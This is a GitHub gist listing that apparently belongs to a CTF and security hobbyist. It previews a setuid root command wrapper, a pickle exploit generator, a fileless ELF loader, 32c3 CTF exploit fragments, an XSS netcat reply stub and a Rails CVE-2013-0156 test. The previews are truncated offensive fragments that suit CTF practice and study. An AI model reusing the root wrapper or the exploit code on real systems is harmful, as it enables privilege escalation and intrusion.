@0xBADCA7
0xBADCA7 / setuid_execute.c
Last active August 29, 2015 14:25
SETUID wrapper for *nix systems
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
system(argv[1]);
0xBADCA7 / ftp_lastmodified.sh
Created October 22, 2015 22:24
Get files last modified less than $days ago
#!/bin/bash
# Get files last modified less than $days ago
# Inspired by some scripts at http://goo.gl/QDY1BO
# - 0xBADCA7
# Login credentials
user='anonymous' #Do not forget to enclose inside single or double quotes
pass='anon@ymo.us'
directory='/usr'
0xBADCA7 / stats.py
Created October 22, 2015 23:53
Basic summary for malware site stats
# Invoke as:
# > cat sites.txt | python stats.py
#
#!/usr/bin/env python3
import fileinput, re
clean, superclean, blacklisted, malware = 0, 0, 0, 0
0xBADCA7 / latency.txt
Created November 8, 2015 13:49 — forked from jboner/latency.txt
Latency Numbers Every Programmer Should Know
Latency Comparison Numbers
--------------------------
L1 cache reference                       0.5 ns
Branch mispredict                        5   ns
L2 cache reference                       7   ns             14x L1 cache
Mutex lock/unlock                       25   ns
Main memory reference                  100   ns             20x L2 cache, 200x L1 cache
Compress 1K bytes with Zippy         3,000   ns
Send 1K bytes over 1 Gbps network   10,000   ns    0.01 ms
Read 4K randomly from SSD*         150,000   ns    0.15 ms
0xBADCA7 / pickle_exploit_generator.py
Last active August 1, 2022 02:08
Python cPickle/pickle exploit generator
#!/usr/bin/env python
'''
0xBADCA7
Vodka goes down the throat better with pickle.
This script generates pickled object representation. Good for CTFs.
Params: [1] function, [2] parameter, [3] pickle type
Sample run:
0xBADCA7 / nodisk.c
Created December 15, 2015 10:37
Load an ELF without touching the disk
#define _GNU_SOURCE
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
0xBADCA7 / unshare.c
Created December 30, 2015 09:26 — forked from stephenR/doit.sh
32c3_vault_exploit.c
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sched.h>
#include <sys/mount.h>
int main(int argc, char *argv[])
{
if(unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {
0xBADCA7 / cors_http_reply.txt
Created December 31, 2015 00:00
A stub for HTTP 200 reply with CORS headers. Useful for piping into netcat when XSS'ing. One reply is for the OPTIONS request.
HTTP/1.1 200 OK
Server: MSLC
Date: Sun, 28 Dec 2015 08:50:04 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Status: 200 OK
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
0xBADCA7 / object_injection_test.php
Created January 2, 2016 19:21
PHP object injection in 32c3 MonkeyBASE
<?php
$stream_context = array (
'http' => array (
'follow_location' => FALSE
) );
Class VISUALIZER{
public $url;
public $context;
public $host;
0xBADCA7 / yml_security_test.rb
Created January 15, 2016 11:48 — forked from jmccaffrey/yml_security_test.rb
Simple Rails security test for CVE-2013-0156
#you can copy this into IRB or just run it as a file
require "net/http"
require "uri"
# require "net/https" # for testing ssl
url = "http://localhost:3000/login"
yaml = %{ --- !ruby/object:Time {} }
xml = %{<?xml version="1.0" encoding="UTF-8"?><foo type="yaml">#{yaml}</foo>}.strip